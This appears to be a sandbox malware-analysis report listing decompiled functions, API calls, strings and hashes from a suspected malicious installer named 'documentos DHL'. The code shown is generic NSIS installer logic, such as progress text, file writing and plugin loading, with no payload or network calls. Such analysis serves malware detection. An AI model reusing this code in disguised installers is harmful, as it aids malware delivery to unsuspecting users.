Instruction ID: c2f05a2c3ba2ec5405c4fe8fe652dd8f1d703414ee124caa90b8b383e79e86eb
Opcode Fuzzy Hash: dd5e8fa4d463f4addcea7a8cc9fa64d55b0ecfa5d277173ec9cca7ca7d10c693
Instruction Fuzzy Hash: 3201B171904241EFE7006BB0AF4AB9A7FB0BF55301F10493EF242B71E2CAB800469B2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402DD7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402DD7(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				void* _t11;
				WCHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402E56();
					_t19 = L"unpacking data: %d%%";
					if( *0x42a254 == 0) {
						_t19 = L"verifying installer: %d%%";
					}
					wsprintfW( &_v132, _t19, _t11);
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402de7
0x00402df5
0x00402dfb
0x00402dfb
0x00402e09
0x00402e0b
0x00402e17
0x00402e1c
0x00402e1e
0x00402e1e
0x00402e29
0x00402e39
0x00402e4b
0x00402e4b
0x00402e53

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
wsprintfW.USER32 ref: 00402E29
SetWindowTextW.USER32(?,?), ref: 00402E39
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E4B

Strings

unpacking data: %d%%, xrefs: 00402E17, 00402E27
verifying installer: %d%%, xrefs: 00402E1E

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
Instruction ID: 0bc749b122006b2f9f6abad3e9991ed6065550717762caf8ffdc158a825a6066
Opcode Fuzzy Hash: 5563c221c1669b5fd2184c8b70bdefae7b5ad080d5cf5862aa05c867891839d9
Instruction Fuzzy Hash: 69F0367154020DABDF206F50DD4ABEA3B69FB00714F00803AFA06B51D0DBFD55598F99

Uniqueness

Uniqueness Score: -1.00%

Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A4(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B4))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024ae
0x100024b0
0x100024bf
0x100024c5
0x100024d2
0x100024d4
0x100024d8
0x100024d8
0x100024e0
0x100024e6
0x100024e8
0x00000000
0x100024ef
0x00000000
0x00000000
0x100024f5
0x00000000
0x00000000
0x100024ff
0x00000000
0x00000000
0x10002506
0x1000250c
0x10002518
0x1000251e
0x10002523
0x00000000
0x00000000
0x10002545
0x00000000
0x00000000
0x1000252b
0x10002531
0x10002532
0x10002534
0x00000000
0x00000000
0x1000254d
0x1000254f
0x10002551
0x10002553
0x10002553
0x00000000
0x00000000
0x100024e8
0x10002556
0x10002556
0x1000255b
0x1000256d
0x1000256d
0x10002573
0x10002578
0x1000257d
0x10002589
0x1000258e
0x00000000
0x10002593
0x1000257f
0x10002580
0x10002594
0x10002594
0x1000257d
0x10002595
0x10002599
0x1000259c
0x100025b3

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 1000256D
GlobalFree.KERNEL32(00000000), ref: 100025A8

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 004028A7 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E004028A7(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x30)) = 0xfffffd66;
				_t50 = E00402C37(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405CF8(_t50) == 0) {
					E00402C37(0xffffffed);
				}
				E00405E7D(_t50);
				_t26 = E00405EA2(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x42a258;
					 *(_t56 - 0x3c) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403441(_t45);
						E0040342B(_t49,  *(_t56 - 0x3c));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x20));
						 *(_t56 - 0x4c) = _t54;
						if(_t54 != _t45) {
							E004031BA(_t47,  *((intOrPtr*)(_t56 - 0x24)), _t45, _t54,  *(_t56 - 0x20));
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x34) =  *_t54;
								E00405E5D( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x34);
							}
							GlobalFree( *(_t56 - 0x4c));
						}
						E00405F54( *(_t56 + 8), _t49,  *(_t56 - 0x3c));
						GlobalFree(_t49);
						 *((intOrPtr*)(_t56 - 0x30)) = E004031BA(_t47, 0xffffffff,  *(_t56 + 8), _t45, _t45);
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x30)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x004028a7
0x004028a9
0x004028b5
0x004028b8
0x004028c2
0x004028c6
0x004028c6
0x004028cc
0x004028d9
0x004028e1
0x004028e4
0x004028ea
0x004028f8
0x004028fd
0x00402901
0x00402904
0x0040290d
0x00402919
0x0040291d
0x00402920
0x0040292a
0x00402949
0x00402931
0x00402936
0x0040293e
0x00402941
0x00402946
0x00402946
0x00402950
0x00402950
0x0040295d
0x00402963
0x00402975
0x00402975
0x0040297b
0x0040297b
0x00402986
0x00402987
0x0040298b
0x0040298f
0x00402995
0x00402995
0x0040299c
0x00402245
0x00402ac2
0x00402ace

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 004028FB
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 00402917
GlobalFree.KERNEL32(?), ref: 00402950
GlobalFree.KERNEL32(00000000), ref: 00402963
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,000000F0), ref: 0040297B
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 0040298F

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
Instruction ID: c824e8dfb1c84b3956194132b72a9c46ff30f807773af65f81dcebc4e122496d
Opcode Fuzzy Hash: 71fa0d7f1f6972b2f5f4a603ea8383ed055fcf66cbac6c56c0d77bb029e8dc11
Instruction Fuzzy Hash: 6521BFB1800128BBDF216FA5DE49D9E7E79EF09364F10023AF960762E0CB7949418B98

Uniqueness

Uniqueness Score: -1.00%

Function 00404BD0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00404BD0(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v68;
				char _v132;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t23;
				signed int _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				signed int _t55;

				_t23 = _a16;
				_t53 = _a12;
				_t44 = 0xffffffdc;
				if(_t23 == 0) {
					_push(0x14);
					_pop(0);
					_t24 = _t53;
					if(_t53 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t44 = 0xffffffdd;
					}
					if(_t53 < 0x400) {
						_t44 = 0xffffffde;
					}
					if(_t53 < 0xffff3333) {
						_t52 = 0x14;
						asm("cdq");
						_t24 = 1 / _t52 + _t53;
					}
					_t25 = _t24 & 0x00ffffff;
					_t55 = _t24 >> 0;
					_t46 = 0xa;
					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
				} else {
					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
					_t50 = 0;
				}
				_t31 = E004063D2(_t44, _t50, _t55,  &_v68, 0xffffffdf);
				_t33 = E004063D2(_t44, _t50, _t55,  &_v132, _t44);
				_t34 = E004063D2(_t44, _t50, 0x423728, 0x423728, _a8);
				wsprintfW(_t34 + lstrlenW(0x423728) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
				return SetDlgItemTextW( *0x429218, _a4, 0x423728);
			}

0x00404bd9
0x00404bde
0x00404be6
0x00404be7
0x00404bf4
0x00404bfc
0x00404bfd
0x00404bff
0x00404c01
0x00404c03
0x00404c06
0x00404c06
0x00404c0d
0x00404c13
0x00404c13
0x00404c1a
0x00404c21
0x00404c24
0x00404c27
0x00404c27
0x00404c2b
0x00404c3b
0x00404c3d
0x00404c40
0x00404be9
0x00404be9
0x00404bf0
0x00404bf0
0x00404c48
0x00404c53
0x00404c69
0x00404c7a
0x00404c96

APIs

lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C71
wsprintfW.USER32 ref: 00404C7A
SetDlgItemTextW.USER32(?,00423728), ref: 00404C8D

Strings

(7B, xrefs: 00404C63
%u.%u%s%s, xrefs: 00404C5B

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$(7B
API String ID: 3540041739-1320723960
Opcode ID: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
Instruction ID: 703546cccce40a16f7c4e0327b319c47dc4604cc2262111db7ea86f65ec4581c
Opcode Fuzzy Hash: 58f77135636fcca40ac9b9d1b3b9f97977a6748d84aaa2f98ffb75d2f2ac1724
Instruction Fuzzy Hash: 0911E7736041287BEB00556DAD46EAF329CDB85374F254237FA66F31D1DA79CC2182E8

Uniqueness

Uniqueness Score: -1.00%

Function 00402592 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402592(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t14;
				int _t17;
				int _t24;
				signed int _t29;
				intOrPtr* _t32;
				void* _t34;
				void* _t35;
				void* _t38;
				signed int _t40;

				_t32 = __esi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x20);
				_t38 = __edx - 0x38;
				 *(_t35 - 0x4c) = _t14;
				_t27 = 0 | _t38 == 0x00000000;
				_t29 = _t38 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402C37(0x11)) + _t16;
					} else {
						E00402C37(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp\System.dll", 0x400, __ebx, __ebx);
						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp\System.dll");
					}
				} else {
					E00402C15(1);
					 *0x40add8 = __ax;
					 *((intOrPtr*)(__ebp - 0x3c)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t32 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t34 = E00406310(_t27, _t32);
					if((_t29 |  *(_t35 - 0x4c)) != 0 ||  *((intOrPtr*)(_t35 - 0x1c)) == _t24 || E00405F83(_t34, _t34) >= 0) {
						_t14 = E00405F54(_t34, "C:\Users\Arthur\AppData\Local\Temp\nsw5DC6.tmp\System.dll",  *(_t35 + 8));
						_t40 = _t14;
						if(_t40 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x00402592
0x00402592
0x00402592
0x00402597
0x0040259a
0x0040259d
0x004025a2
0x004025a4
0x004025c4
0x00402602
0x004025c6
0x004025c8
0x004025e2
0x004025ed
0x004025ed
0x004025a6
0x004025a8
0x004025ad
0x004025bb
0x004025be
0x00402607
0x0040260a
0x00402885
0x00402885
0x00402610
0x00402619
0x0040261b
0x0040263a
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x0040261b
0x00402ac2
0x00402ace

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll,00000400,?,?,00000021), ref: 004025E2
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll,00000400,?,?,00000021), ref: 004025ED

Strings

C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll, xrefs: 004025AD, 004025D4, 004025E8, 00402634
C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp, xrefs: 004025DB

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp$C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp\System.dll
API String ID: 3109718747-833400593
Opcode ID: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
Instruction ID: 778b7e41730bacb68cbd472b7e3a637cf80abcfea8faeb2db308f16ae4ae4a1c
Opcode Fuzzy Hash: 04c8a0be0a3c8b5bca7af342d1437c7cd7f7eafe97cd42d6f17c4336303185e8
Instruction Fuzzy Hash: 35112E72A00204BBDB146FB18F8D99F76649F55394F20443BF502F61C1DAFC48425B5E

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135
memoryCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E100022D0(void* __edx) {
				void* _t37;
				signed int _t38;
				void* _t39;
				void* _t41;
				signed int* _t42;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t41 = 0x1a;
					if(_t52 == _t41) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t41;
							goto L12;
						} else {
							_t37 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t37 = E10001243();
						L11:
						_t52 = _t37;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t42 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t38 =  *_t51;
						_t51[7] = 0;
						if(_t38 > 7) {
							L27:
							_t39 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t39;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t38 * 4 +  &M10002447))) {
								case 0:
									 *_t42 = 0;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if( *__ebp != __cx) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t37 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x1000234e
0x10002351
0x10002410
0x10002411
0x1000241c
0x10002446
0x10002446
0x1000242c
0x10002438
0x1000242e
0x1000242e
0x1000242e
0x00000000
0x10002357
0x10002357
0x00000000
0x1000235e
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023d7
0x100023da
0x100023e6
0x100023e8
0x00000000
0x00000000
0x100023f4
0x10002400
0x10002403
0x10002405
0x10002408
0x00000000
0x00000000
0x10002357
0x10002351
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Uniqueness

Uniqueness Score: -1.00%

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41
memorylibraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E100015FF(struct HINSTANCE__* _a4, short* _a8) {
				_Unknown_base(*)()* _t7;
				void* _t10;
				int _t14;

				_t14 = WideCharToMultiByte(0, 0, _a8, 0xffffffff, 0, 0, 0, 0);
				_t10 = GlobalAlloc(0x40, _t14);
				WideCharToMultiByte(0, 0, _a8, 0xffffffff, _t10, _t14, 0, 0);
				_t7 = GetProcAddress(_a4, _t10);
				GlobalFree(_t10);
				return _t7;
			}

0x10001619
0x10001625
0x10001632
0x10001639
0x10001642
0x1000164e

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
